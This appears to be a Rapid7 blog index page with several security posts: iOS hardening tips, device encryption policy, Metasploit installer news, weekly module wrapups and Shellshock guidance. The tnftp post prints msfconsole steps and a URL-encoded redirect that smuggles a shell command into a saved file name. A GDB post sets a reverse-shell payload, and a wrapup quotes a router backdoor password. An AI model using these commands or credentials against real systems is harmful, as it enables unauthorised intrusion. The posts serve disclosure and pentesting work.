configure a good password. The backup password will be pushed to the phone, and a backup will be performed. Be sure to perform future backups frequently and that your password is stored safely. Testing To see how the changes we performed impact the behavior of the device, here are some examples. Browsing to a HTTPS site with a self-signed certificate As you can see, it fails, and does not allow you to make a dangerous decision consciously or by mistake. Trying to enable iCloud Backup Weirdly, there seems to be a bug in iOS 9.1 that will show iCloud Backup as active on the iCloud pane, but when you drill down, you see it is disabled but greyed out. Pairing If you've prevent pairing, simply try to connect your device via USB to another computer you own, start iTunes or Photos and try to interact with it. The Trust modal dialog should not appear, and data will not be importable. Final Words In a world where most people use cloud services for things such as music streaming and photo storage, USB connectivity is less important than ever before for phones and tablets. As people travel with these devices more and more, attacks on the networks they connect to, or on the physical devices themselves, are more and more probable. If you enable all of these features, you now have an iOS device that is less susceptible to man-in-the-middle attacks to steal data or credentials, that is more resistant to adversaries that might want to back it up to a computer to dig into the backed up data, is slightly better at handling websites securely, and that will enforce your backup strategy and be protected against malicious enterprise applications. If you've only opted for the settings that did not require supervisions, you still have an improved posture, and I hope you will decide to supervise your next iOS device, as soon as you open the box! Special thanks to Jimmy Vo for reviewing, and to Brendan O'Connor for commenting and making me realize that this article should be written.

The Haves And Have-Nots in Device Security

Today's story about the ongoing issues law enforcement is running into with Apple's encrypted-by-default design illustrates a major difference between the iPhone and the Android security models. Encryption by default on older Apple devices makes it impossible for anyone without the password to decrypt the…

Today's story about the ongoing issues law enforcement is running into with Apple's encrypted-by-default design illustrates a major difference between the iPhone and the Android security models. Encryption by default on older Apple devices makes it impossible for anyone without the password to decrypt the phone. This, in turn, becomes a problem for law enforcement, since it means that barring an exploitable boot-time vulnerability, no one can peek in on personal data stored on an iPhone. This leaves not only law enforcement with a compelling reason and a court order, but also criminal and espionage organizations out in the cold. Of course, an individual or rogue element in a law enforcement organization also cannot spy on most iPhone users' stored data with or without judicial oversight. This is itself a pretty strong guarantee of civil liberties, and helps protect Fourth Amendment guarantees in the U.S.The fact that the U.S. Department of Justice is still asking for Apple's help, and Apple's statements that it's technically unfeasible to help the DoJ, is good news for end users who are concerned with personal privacy. I can appreciate the government's frustration with device encryption in cases where they suspect the evidence is there and the device's owner is being uncooperative. But, the fact is that if there is a backdoor to device encryption, or other means for law enforcement to subvert encryption with a court order, it would mean there is a technical capability for anyone to do the same as soon as the mechanism became known, and judicial oversight and good intentions become optional.Unfortunately, Android phones do not enjoy this level of across-the-board privacy protection. According to the Android Compatibility Definition, there are many, many mid-range and lower-end devices that are exempt from encryption by default, even in Marshmallow, the latest named release. Section 9.9 exempts devices that don't meet a minimum performance threshold, and other devices may define a default (and therefore, discoverable) password to the encryption key in certain implementation circumstances.The lack of encryption-by-default on Android is problematic from a civil liberties perspective. Android devices are less expensive than iPhones, and account for over 80% of all smartphones. So, while iPhone continues to provide the safer default configuration, the vast majority of people who use smartphones as their primary Internet device will not enjoy the privacy-enhancing benefits of on-board encryption.It's a shame that there exists this haves and have-nots dichotomy when it comes to default privacy guarantees. I'm hopeful that people who value the security of their privacy are aware of the differences between Android devices, and how they compare to their Apple counterparts. While it's possible to enable local disk encryption on many Android devices, end users rarely poke into settings beyond the defaults. Put simply, people shouldn't have to be rich enough to afford, or expert enough to configure, a device for basic privacy and security in order to enjoy their benefits.

Metasploit Framework Open Source Installers

Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework as well as commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features…

Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework as well as commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features are very useful, we recognized that they are not for everyone. According to our recent survey of Metasploit Community users, most only used it for the open source components, preferring to use the command-line tools over the graphical ones. Also, while we do our best to ensure that Metasploit Community and Pro releases are of high quality, they are not always supplied with the latest hot new exploits and payloads available in Metasploit Framework. While it has always been possible to simply setup a development environment and run the latest metasploit-framework code from github directly, it can still be tricky to setup and keep up to date. Kali Linux 2.0 now publishes the open source pieces of Metasploit Framework with its distribution, but the release schedule still follows that of Metasploit Community / Pro editions, and it of course does not necessarily help those who prefer other operating systems. To address the needs of open source enthusiasts, those needing more frequent updates, or those simply looking for an easy way to setup a database for Metasploit Framework development use, we have created Open Source installers for Metasploit Framework for Windows, OS X and Linux x86 and x86-64 platforms. These installers utilize the Omnibus tool from chef in order to package everything needed to run Metasploit Framework, from dependent libraries, specific Ruby versions up to a built-in PostgreSQL database. The installers are easy to install and get up and running in seconds. They are also built and tested automatically each night, so you can always run 'msfupdate' and get the latest exploits and payloads without having to setup a development environment. The installers also integrate with your OSes native package manager, be it Linux RPM or DEB-based, MSI for Windows or PKG for OS X. That makes them easy to uninstall as well. For information about how to install and use these new packages, see our wiki page on the Metasploit Framework project github project. The installers themselves are also open source. So if you see a problem, pull requests or issue reports are very welcome! Note that in addition to these Metasploit-specific installers, there are other ways to get Metasploit Framework, such as through Dave Kennedy's PenTester Framework or even pre-installed in Kali Linux. The Metasploit Framework omnibus installers provide another way to get the open source Metasploit Framework running on a variety of platforms quickly and easily.

Weekly Metasploit Wrapup

Time for another weekly wrapup for Metasploit! Since it's been getting some play in the news, I wanted to use this space to talk a little bit more about CERT's recent advisory regarding hardcoded credentials on small office / home office (SOHO) routers. You probably know…

Time for another weekly wrapup for Metasploit! Since it's been getting some play in the news, I wanted to use this space to talk a little bit more about CERT's recent advisory regarding hardcoded credentials on small office / home office (SOHO) routers. You probably know it by it's decidedly non-poetic identifier, VU#950576. Hardcoded credentials are one of the most well-known common vulnerabilities for SOHO routers from nearly every vendor. These are not software bugs in the traditional sense, but specific username and passwords that are trivial to exploit, very rapidly, across thousands to millions of these devices. These backdoors are usually not reachable directly from the Internet; the attacker must be on the local network in order to use them to reconfigure devices. However, this shouldn't necessarily be comforting. While attackers must be "local," most of these credentials are usable on the configuration web interface, and a common technique is to use a cross-site scripting (XSS) attack on a given website to silently force the user (on the inside network) to log in to the device and commit changes on the attacker's behalf. Attackers on free, public WiFi are also on the local network, and can make configuration changes to a router that can affect anyone else connected to that access point. Once an attacker has administrative control over the router, the opportunity for mischief and fraud are nearly limitless. He can do anything from setting up custom DNS configurations, which will poison the local network's name resolution, to completely replacing the firmware with his own, enabling him to snoop and redirect any and all traffic at will. Backdoor credentials like these are certainly not new; simply Googling the Observa Telecom hidden administrator account password, 7449airocon, turns up nearly 400 hits on sites ranging from legitimate router security research blogs to sites dedicated to criminal activity. I'm glad that CERT/CC is bringing attention to this problem. Manufacturers must make every effort to at least allow end-users to change these passwords, and ideally, passwords would be generated, randomly, on first boot or firmware restore. Until manufacturers stop using default passwords on the devices users rely on for Internet connectivity, we will continue to see opportunistic attacks on home and small business routers. So what does this all have to do with Metasploit? Well, we have a few contributors who regularly kick out exploit and auxiliary modules for SOHO land, with Michael m-1-k-3 Messner as the reigning champion of most SOHO router modules authored. That guy is pretty amazing, and thanks to his and all the rest of the SOHO router hacking crowd, we have about fifty or so Metasploit modules specifically for SOHO routers. The bummer, of course, is that SOHO routers are rarely in scope for any normal pentest, unless your engagement is with a retail coffee shop or restaurant or something. We've known that the "border" between the external network and the internal network is a convenient fiction, and that division is eroding even more today as more and more people opt out of traffic (and pants) by telecommuting to work. Because of this trend, which shows no signs of slowing down, I hope to see pentesting scopes start to include that home network with the backdoor'ed router. If you have decently-sourced stats on organizations who get popped by an attacker pivoting through a home router, or otherwise using SOHO router control to skip into a company's internal network, I'd love to see them. Just comment below. New Modules We have nine new modules this week: four exploits and five auxiliary modules. Pay extra attention to the OS X 'tpwn' bug, which was discussed at length a week or so back. It's a privilege escalation issue, and while it's local only, there are scenarios where I can imagine this thing would be very effective. US schools sometimes have shared computer labs, full of Apple desktops, shared several times a day with many people. If one of them happens to have root on OS X, it's not all that difficult to start keystroke logging and picking up everyone's Myspace account credentials. Or whatever other social media service that the kids are into these days. For other changes since the last Wrapup, just swing by this compare view, and see who all has been hacking on Metasploit Framework lately. Exploit modules Firefox PDF.js Privileged Javascript Injection by joev, Marius Mlynski, and Unknown exploits CVE-2015-0802 Mac OS X "tpwn" Privilege Escalation by wvu and qwertyoruiop VideoCharge Studio Buffer Overflow (SEH) by Andrew Smith, Christian Mehlmauer, and metacom exploits OSVDB-69616 Symantec Endpoint Protection Manager Authentication Bypass and Code Execution by Markus Wulftange and bperry exploits CVE-2015-1489 Auxiliary and post modules Firefox PDF.js Browser File Theft by Unknown, Unknown, and fukusa exploits CVE-2015-4495 Android Settings Remove Device Locks by CureSec and timwr exploits CVE-2013-6271 PuTTY Saved Sessions Enumeration Module by Stuart Morgan Windows Powershell Execution Post Module by Nicholas Nam (nick and RageLtMan Load Scripts Into PowerShell Session by Ben Turner benpturner and Dave Hardy davehardy20

Top 10 list of iOS Security Configuration GIFs you can send your friends and relatives

Easily share these animated iOS Security tips with friends and relatives! While iOS is generally considered to be quite secure, a few configuration items can improve its security. Some changes have very little functionality impact, while others are more visible but probably only needed in…

Easily share these animated iOS Security tips with friends and relatives! While iOS is generally considered to be quite secure, a few configuration items can improve its security. Some changes have very little functionality impact, while others are more visible but probably only needed in specific environments. This guide contains some of the most important, obvious ones, and contains a GIF for each configuration step to be taken. If you already know everything about iOS security, use this as a way to easily explain to friends and relatives how certain configurations are changed. As most of our readers are in the security field, we actually expect this to be more useful as a way for you to help your friends and relatives. Why GIFs? They are awesome. They can lead to entertaining discussions about why it is wrong to pronounce GIF with a soft G. Because while you, awesome reader, may know how to perform these configuration changes, you may not know the steps by heart or want to walk your friends through step-by-step. Just re-gif these! (Pun intended. I am sorry). Steps Do not Jailbreak it This is our first step, and we are already cheating. There is nothing for you to do. While jailbreaking can be very useful for testing the security of iOS applications or iOS itself, jailbreaking a "day to day" phone is dangerous, as it disables many of the protections of iOS. Software Updates iOS iOS will regularly check for new versions, but if this is a new device, or one that hasn't been used in a while, you should check manually. Application Updates Applications need to be updated too. Sometimes for bug fixes, and sometimes for security patches. Fortunately, iOS allows automated patching, making it painless. Give it a good passcode, enable auto-lock and “Erase Data” Note: If your phone is TouchID equipped, using a longer password with different types of characters can add security without being too painful, as you will rarely use the password. I personally set auto-lock to lock my devices instantly, because with TouchID allows me to unlock it so fast. I know that if I forgot my phone on a table or in a cab, I would feel better knowing there was no time window where someone could snoop through my stuff easily. The "Erase Data" feature ensures that the phone is wiped after too many failed attempts. WiFi WiFi: Ensure WiFi doesn't ask to join potentially insecure networks iOS has an option to prompt you to join networks automatically. Let's make sure it's off. Safari Safari has various options to request that sites do not track you (which sites may or may not honor), to only accept cookies from the site you are visiting and more. Additional privacy measures can be taken with Safari, such as ensuring search engine suggestions are not used, that the top hit is not reloaded and more. These have an impact on usability and are more subtle in the protection they provide. While storing passwords in a browser is typically a bad idea, we recommend that you read this article by Rich Mogull before dismissing iCloud Keychain completely. It certainly beats not using a password management tool at all. Find my iPhone A lost phone can mean having to buy a new one, and we know these devices are expensive. It can also mean someone has access to your data, email account and more. By having a good passcode on your phone, you greatly limit the odds that someone who found your phone could use it. By enabling Find my iPhone, you can make sure that they can't wipe it and enable it for themselves and you can display a message on the screen, asking the person who found it to contact you. Two settings exist for Find my iPhone. The first one enables it, which is very simple. From that moment, you can login to iCloud to set your phone as lost, and see its location and send a message to it. Apple receives the device location when that lost mode is enabled. The second option allows your phone to send its location before running out of battery. This can be very useful if you lose your phone in a location where nobody finds it, and it runs out of battery before you notice. Be aware that enabling that second option means Apple will receive the phone's location even when you have not set it as lost yet. Edit: As mentioned by reader @ClausHoumann on Twitter, network connectivity is required for Find my iPhone to work. This means that if you are traveling without a data plan and roaming enabled (because it is expensive in a lot of areas), Find my iPhone will not work. It will still prevent activation of your phone. Thank you Claus! Never trust computers or devices you do not own If you ever connect your phone to a device you do not own, and see this screen, never trust it. If you have trusted a device or computer by mistake, follow the steps in this knowledge base article to remove the trusted relationship from your iOS device. Trusted devices can access data on your phone to back it up, sync data to it. Only your own computer should be trusted by your phone. Note: Charging your phone on an untrusted computer, or even a USB charger that is not yours can carry some risk. If you see this prompt when using what should be a "dumb" USB charger, consider it suspicious. If you are at a security conference, do not trust any USB charger provided by people with black t-shirts. Avoid receiving images from weird strangers during your commute AirDrop is very useful, but if left open to everyone, can lead to [bizarre interactions](/blog/(http:/www.theverge.com/tldr/2014/11/10/7171345/the-best-use-for-apple-airdrop-is-space-sloths). Enable iCloud "Two-Step Verification" Last, but not least, ensure you enable this feature on your iCloud Account. For this last recommendation, we cheat and do not provide a GIF. Simply go to Apple's Knowledge Base for more information. Enabling this will require you to link your trusted iOS device(s), and to provide a 4 digit PIN sent to one of them when you login to iCloud or AppleID related services. This will significantly reduce the odds of bad things happening to your iCloud account, data or devices linked to iCloud if your password was compromised. Save your Recovery Key safely, as if you lose it and your password or devices at the same time, you might be in trouble!

12 Days of HaXmas: RCE in Your FTP

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. It's been quite a year for shell bugs. Of course, we…

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug? That remains unpatched today on a fairly popular operating system? Read on... popen()'ing an RCE present Shortly before Halloween, I was reading the oss-sec mailing list when I stumbled upon a pretty cool (almost tragic) bug in the ftp(1) command on {Free,Net,DragonFly}BSD and OS X. The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module: This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource. If tnftp is executed without the -o command-line option, it will resolvethe output filename from the last component of the requested resource. If the output filename begins with a "|" character, tnftp will pass thefetched resource's output to the command directly following the "|" character through the use of the popen() function. Okay, so how do we use this thing? We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy: msf > use auxiliary/server/tnftp_savefile msf auxiliary(tnftp_savefile) > set uripath / uripath => / msf auxiliary(tnftp_savefile) > set urihost [redacted] urihost => [redacted] msf auxiliary(tnftp_savefile) > set uriport 80 uriport => 80 msf auxiliary(tnftp_savefile) > run [*] Auxiliary module execution completed msf auxiliary(tnftp_savefile) > [*] Using URL: [*] Local IP: [*] Server started. Don't worry about the URIHOST or URIPORT advanced options unless you're working through a tunnel. Just set URIPATH to / to allow any URL to redirect to the exploit. Triggering the vulnerability Here we are triggering the vuln on a fully patched OS X Yosemite system: wvu@hiigara:~$ ftp http://[redacted]/index.html Requesting http://[redacted]/index.html Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61 Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61 0 0.00 KiB/s Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64 0 0.00 KiB/s wvu@hiigara:~$ Thanks to the redirect, we can hide the true purpose of our URL until it's too late. Back in msfconsole, we can see the results of our attack: [*] tnftp_savefile - tnftp/20070806 connected [*] tnftp_savefile - Redirecting to exploit... [+] tnftp_savefile - Executing `uname -a'! That's really all there is to it! Happy hacking!

Apple Releases Patch for Shellshock, May Still Be Vulnerable

Yesterday, Apple released security updates that address two of the "Shellshock" bash vulnerabilities: CVE-2014-6271 and CVE-2014-7169. At the time of writing, the updates are not available using Software Update on OS X. Instead, users should download the package directly from Apple's web site to install…

Yesterday, Apple released security updates that address two of the "Shellshock" bash vulnerabilities: CVE-2014-6271 and CVE-2014-7169. At the time of writing, the updates are not available using Software Update on OS X. Instead, users should download the package directly from Apple's web site to install it. Updates are available for 10.7 (Lion), 10.8 (Mountain Lion) and 10.9 (Mavericks).Amidst the flurry of activity and interest around Shellshock over the last week, several additional bash vulnerabilities have come to light. The initial fix for CVE-2014-6271 was incomplete, leading to CVE-2014-7169 being found. Since then, several more related CVEs have been announced. Hanno Böck has released a simple tool called bashcheck that tests which vulnerabilities an installed version of bash is susceptible to. I ran this on a patched version of 10.8 (Mountain Lion) and verified the fix addresses the first two vulnerabilities, but it seems that the updated version of bash may still be vulnerable to CVE-2014-7186:All OS X users are advised to apply this update immediately. Metasploit already has a local root exploit for OS X via VMWare Fusion due to CVE-2014-6271.Additional information about this update from Apple is available in this post to their security-announce mailing list.Update (October 2nd):OS X users can breathe a little easier. The bashcheck script has been updated with some refined tests, which now indicate that although Apple's updated version of Bash does still contain two Shellshock-related bugs, they are not actually exploitable. Output from a patched Mavericks system:Just to drive home the importance of applying this update, here is the result from an unpatched Mavericks system:

Bash-ing Into Your Network & Investigating CVE-2014-6271

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track ShellShock/bash bug-related issues have been announced. A new patch was released on Saturday September 27 that addressed the more critical CVEs (CVE-2014-6277 and CVE-2014-6278).  In sum:…

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track ShellShock/bash bug-related issues have been announced. A new patch was released on Saturday September 27 that addressed the more critical CVEs (CVE-2014-6277 and CVE-2014-6278).  In sum: If you applied the ShellShock-related patches before Saturday September 27, you likely need to apply this new patch. We have updated our original blog post below to reflect this new information.]Original blog post with September 29 updates below: By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal.  It's rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released September 25, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fixes are being tracked as CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278.Should I panic?The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process.What is vulnerable?This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash.Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise).There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. (There are Metasploit modules available validating this exploit path.)Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of a approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue.In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.The two most likely situations where this vulnerability will be exploited in the wild:Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shellPHP applications running in CGI mode that call out to system() and where Bash is the default shellBottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to remotely exploit it are fairly uncommon for remote exploitation. Update (September 25): A DDoS bot that exploits this issue has already been found in the wild by @yinettesys.Update (September 29):  There have been several reports of CVE-2014-6271 being exploited through worms.There is Proof of Concept code to exploit DHCP found by Geoff Walton.There have been memory corruption flaw in the Bash parser found by @taviso being tracked as CVE-2014-7186 and CVE-2014-7187.  We don't expect to see exploit code immediately and it wouldn't be applicable without specific targeting.A couple new issues were found by Michal Zalewski (@lcamtuf) the first, CVE-2014-6277, permits remote code execution and requires a high level of expertise.  The second, CVE-2014-6278, is more severe as it allows remote code execution and doesn't require a high level of expertise.  These two vulnerabilities have been resolved in upstream patches Ubuntu/RHEL/Debian that include Florian Weimer's unofficial patch.Is it as bad as Heartbleed?There has been a great deal of debate on this in the community, and we're not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks.BUT – and that's a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact way more widespread.What can we do to help?[Updated October 1]Rapid7 Metasploit has been updated to assist with the detection and verification of these issues. Modules for testing various exploitation paths are available in both Metasploit Community and Pro. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. Rapid7 Nexpose has been updated with authenticated and remote checks for CVE-2014-6271 and CVE-2014-7169. Nexpose 5.10.12 improves the accuracy for the remote Shellshock (CVE-2014-6271) vulnerability check customers should update their Nexpose deployments to Nexpose 5.10.12.  Nexpose 5.10.13 added authenticated coverage has been added for CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278.If you would like some advice on how to handle this situation, our Services team can help.Are Rapid7's solutions affected?[Updated September 29]Nexpose Virtual Appliances are provided with the Ubuntu distribution operating system, which has patches for both CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187. We've just updated the Nexpose Virtual Appliance Deployment Guide with the instructions to update the underlying Ubuntu OS. We recommend that you review the guide and apply the latest system patches that were released on September 27th.More informationWe've gathered all information we've published about BashBug right here: bashbug CVE-2014-6271 (shellshock): What is it? How to Remediate | Rapid7

Weekly Metasploit Update: Apple, GDB, and Dogecoin

Apple TV Tricks This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's…

Apple TV Tricks This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's Chromecast, a similar chunk of consumer hardware, and we didn't want Google to think we were picking on them. Secondly, these aren't just devices that live in people's living rooms. Apple TV has some level of marketing and presence in conference rooms -- in fact, there's literally a "Conference Room" display mode. This means that these devices, which are cheap (under $100 typically) and ubiquitous (at least, Apple hopes so), have a presence on many companies' networks, and almost certainly without any kind of formal IT control or asset management or anything like that. Finally, the access security is basically non-existent. By default, Apple TV devices have no password. If you want some security, you're likely to pick the "OnScreen" mode, where the TV screen displays a four-digit PIN which you are supposed to key into your streaming device (or Metasploit module). Of course, that's trivially bruteforced. Rarely, you'll find an Apple TV device set up with a proper password. What's the risk? Well, if the display is in some public location, and is being used for Serious Business(tm), a prankster can of course cause all kind of hijinks, from obvious (fill in your own shocking WTF image here), to subtle (how about quietly replacing one financial results spreadsheet with another, on the fly)? Ultimately, though, we hope that research like this just brings some awareness to the coming Internet-of-Things and how we're apparently about to have tons and tons of these not-computer computers on our networks, just begging to be entry points for evil-doers. If Apple and Google, who are massive players in this IoT space, can't be bothered to engineer in some kind of sensible and user-friendly security-by-design on these things, how can we possibly expect newcomers with the next big IoT fad to fare any better? The GDB Protocol Last week, we added a new exploit module, "GDB Server Remote Payload Execution". If you've ever scanned a network full of developers, you might discover gdbserver, an unauthenticated remote service that allows developers to debug code in their kernel or on a different machine. Because of the nature of gdbserver, getting a shell is pretty straightforward - write a payload somewhere in RWX memory and execute. To make things easier for a pentester, we implemented a few parts of the gdbserver protocol in the Msf::Exploit::Remote::Gdb mixin, so any module can leverage it. There are lots of ways to get a shell from gdbserver, and there are lots of options that the remote service may or may not support. In addition, the service might be an independent gdbserver binary running on the remote (possibly not even attached to a program), or it might be a "remote stub" that is compiled into an application or kernel. Stubs usually support only a minimal set of features, so we made sure that the exploit module only used features in the required set. The exploit is pretty flexible: it discovers $PC, writes the payload, and continues execution. This is a rather destructive approach (since the original program will have memory contents overwritten), but since it is gdbserver we at least won't crash the target - just hang it if an interrupt or exception is thrown. Here's how to run the module against an arbitrary X86 linux box: msf> use exploits/multi/gdb/gdb_server_exec msf> set payload linux/x86/shell_reverse_tcp msf> set LHOST msf> run Right now, X86 and X86_64 targets (of any platform) are supported, but it would be very easy to extend to other architectures. Feel free to do so! Hack my Dogecoin (Such Doxing. Wow.) This week, my DEF CON interview with Alicia Mae Webb went up on SecureNinjaTV. Feel free to watch the whole thing, in which I talk about how great the Metasploit open source community is and then demo the infamous addJavascriptInterface vulnerability on a very popular browser available today on the Google Play store. I'm really kind of annoyed that this bug is so long-lived. While it's apparently been blocked in the very latest Android 4.4.4 (according to Android Tamer), it's basically a backdoor for any sub-4.4.4 Android version out there today -- that's at least 75% of all Android devices (anyone running less than 4.4). Android 4.4.4 was posted in mid-June of 2014, but of course, not all carriers have picked it up yet, and not all eligible users have updated. Be sure to check if you can pick it up by using your phone's usual over-the-air (OTA) update process. Alternatively, don't pay any attention to that bit at all, and just skip ahead to about the 9:40 mark and watch as I disclose my own Dogecoin wallet private key. Yes, it's encrypted, but a careful transcriber of the shown characters should be able to crack the password pretty quickly, given the right bruteforcing techniques. So, take this as a challenge: if you can crack my private key, feel free to take the Dogecoin as a reward, and even better, let me (and the rest of the world) know how you did it. I'm curious what approach you take. Which reminds me, I need to update Metasploit's Bitcoin Jacker to be more cryptocurrency (and host OS) agnostic. New Modules Including the modules discussed above, we have nine new modules this week. In fact, this week, we surpassed 1337 exploits! That's fun. Exploit modules Railo Remote File Include by Bryan Alexander and bperry exploits CVE-2014-5468 GDB Server Remote Payload Execution by joev ManageEngine Eventlog Analyzer Arbitrary File Upload by Pedro Ribeiro and h0ng10 exploits CVE-2014-6037 SolarWinds Storage Manager Authentication Bypass by juan vazquez and rgod exploits ZDI-14-299 ManageEngine Desktop Central StatusUpdate Arbitrary File Upload by Pedro Ribeiro exploits CVE-2014-5005 Auxiliary and post modules Apple TV Image Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708 Apple TV Video Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708 AppleTV AirPlay Login Utility by 0a29406d9794e4f9b30b3c5d6702c708 and thelightcosine Android Open Source Platform (AOSP) Browser UXSS by joev and Rafay Baloch exploits CVE-2014-6041 Arris DG950A Cable Modem Wifi Enumeration by Deral "Percent_X" Heiland If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More


Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now


Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now